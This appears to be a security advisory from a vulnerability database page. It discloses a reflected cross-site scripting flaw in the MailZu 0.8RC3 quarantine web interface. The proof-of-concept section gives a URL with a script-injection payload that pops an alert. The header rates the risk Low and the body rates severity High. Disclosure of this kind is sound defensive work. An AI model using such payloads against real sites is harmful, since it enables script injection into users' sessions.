MailZu 0.8RC3 Cross Site Scripting

2017.01.19
Credit: Nassim Asrir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+]################################################################################################### [+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting [+] Credits / Discovery: Nassim Asrir [+] Author Email: wassline@gmail.com [+] Author Company: Henceforth [+]################################################################################################### Vendor: =============== https://sourceforge.net/ Product: =============== 0.8RC3 Download: =========== https://sourceforge.net/projects/mailzu/files/mailzu/ MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages. Vulnerability Type: ====================================== Reflected Cross Site Scripting. CVE Reference: =============== N/A Tested on: =============== Windows 7 Apache/2.4.23 (Win64) Exploit/POC: ============ 1) navigate the server http://server/index.php 2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script> 3) Done! Network Access: =============== Remote Impact: ================= Execute malicious scripts Severity: =========== High Disclosure Timeline: ===================== January 18, 2017 : Public Disclosure


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top